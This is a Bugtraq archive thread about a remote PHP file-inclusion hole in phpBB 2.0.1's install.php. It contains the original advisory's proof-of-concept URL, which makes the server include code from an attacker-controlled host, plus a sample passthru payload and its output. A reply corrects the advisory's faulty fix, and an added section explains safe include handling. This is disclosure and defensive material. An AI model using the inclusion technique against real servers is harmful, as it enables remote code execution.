Bugtraq mailing list archives
Re: malicious PHP source injection in phpBB
From: Jonathan Haase <jlhaase () iland net>
Date: Mon, 17 Jun 2002 16:20:21 -0500
Note... The suggested fix for this in the php code below is very incorrect and will in fact leave install.php even more wide open than it currently is...

The correct fix to the php code should be to change the line on or about line 28 which reads...

include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);

to read more properly

include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);

Thanks,
Jonathan L. Haase

On Sunday 16 June 2002 8:29 am, morris Chang wrote:
JCC Security Advisory
June 16, 2002

malicious PHP source injection in phpBB

Description

phpBB is one of the popular PHP bulletin board systems. When allow_url_fopen = On and register_globals = On in php.ini, phpBB has a vulnerability because install.php contains dangerous code. So an attacker can include any file into the server's PHP code.

Impact

It was tested on phpBB 2.0.1, but I think all of phpBB 2 is affected.

Workaround

allow_url_fopen = off and register_globals = off, and if the install is complete, remove or rename install.php.

Or in install.php

-------install.php------------
define('IN_PHPBB', true);
$phpbb_root_path='./';
----------------------------

Put it

-------snip-----------------
$phpbb_root_dir='./';
----------------------------

It is a good idea to code this:

<<PHP_CODE
ini_set("register_globals", "Off");
ini_set ("allow_url_fopen", "Off");
PHP_CODE

Tested systems

phpBB 2.0.1
Debian GNU/Linux SID(x86)

Background

We checked the vulnerability with "http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE" and made a sample code, functions_selects.php,

--------------------includes/functions_selects.php--------------
<? passthru("uname -a"); ?>
-----------------------------------------

and typed the following URL to invoke this sample code.

TEST URL : http://URL/install.php?phpbb_root_dir=http://MYBOX/

-------output----------------------------
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown

Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182

Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183

Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/install.php on line 346
-----------------------------------------

thx for BlackKnight at r0ar

---
http://jcc.hackerslab.org (at morris Chang)
e-mail : morris () xsdeny net
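The include pattern the thread is arguing about, shown next to the one-token fix Jonathan Haase gives and a path-confinement check, as an added PHP example. This is not phpBB's install.php and not code from either poster; the helper safe_include_path(), the ./includes/ layout under $phpbb_root_path and the die() messages are assumptions for illustration, and it needs PHP 7.1 or later for the type declarations.

```php
<?php
// Added example, not phpBB's install.php and not code from the thread.
// Contrasts the include that the advisory exploits with the corrected line
// and a hardened include. Helper names and file layout are assumed.

define('IN_PHPBB', true);
$phpbb_root_path = './';
$phpEx = 'php';

// 1. The vulnerable line as described in the thread. $phpbb_root_dir is never
//    assigned anywhere in this file, so with register_globals=On PHP fills it
//    from the request (?phpbb_root_dir=http://MYBOX/), and with
//    allow_url_fopen=On include() fetches and executes
//    http://MYBOX/includes/functions_selects.php. Kept commented out.
//
//    include($phpbb_root_dir . 'includes/functions_selects.' . $phpEx);

// 2. The fix from the reply: use the variable the script actually sets.
//
//    include($phpbb_root_path . 'includes/functions_selects.' . $phpEx);

// 3. Defence in depth for any include built from a path variable: resolve it
//    on the local filesystem and refuse anything that does not land below
//    the expected root. realpath() knows nothing about stream wrappers, so a
//    value starting with http:// simply resolves to false and is rejected.
function safe_include_path(string $root, string $relative): ?string
{
    $base   = realpath($root);
    $target = realpath($root . '/' . $relative);
    if ($base === false || $target === false) {
        return null;                // missing file, or not a local path at all
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $base, strlen($base)) !== 0) {
        return null;                // escaped the root via ../ or an absolute path
    }
    return $target;
}

// 4. Do not run an installer while register_globals is on. Note that an
//    ini_set('register_globals', 'Off') inside the script comes too late:
//    the request variables are already in the global scope before the first
//    statement executes, so this setting has to be turned off in php.ini or
//    per directory (php_flag register_globals off in .htaccess).
if (ini_get('register_globals')) {
    die('Refusing to run install.php while register_globals is enabled.');
}

$path = safe_include_path($phpbb_root_path, 'includes/functions_selects.' . $phpEx);
if ($path === null) {
    die('includes/functions_selects.' . $phpEx . ' is missing or outside the phpBB root.');
}
include $path;
```

The realpath() check is the part worth keeping once install.php itself has been removed: it turns any later "variable used before assignment in an include" bug from remote code execution into a failed include, regardless of the allow_url_fopen setting.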
Current thread:
- malicious PHP source injection in phpBB morris Chang (Jun 17)
- RE: malicious PHP source injection in phpBB Nathan Anderson (Jun 18)
- Re: malicious PHP source injection in phpBB Jonathan Haase (Jun 18)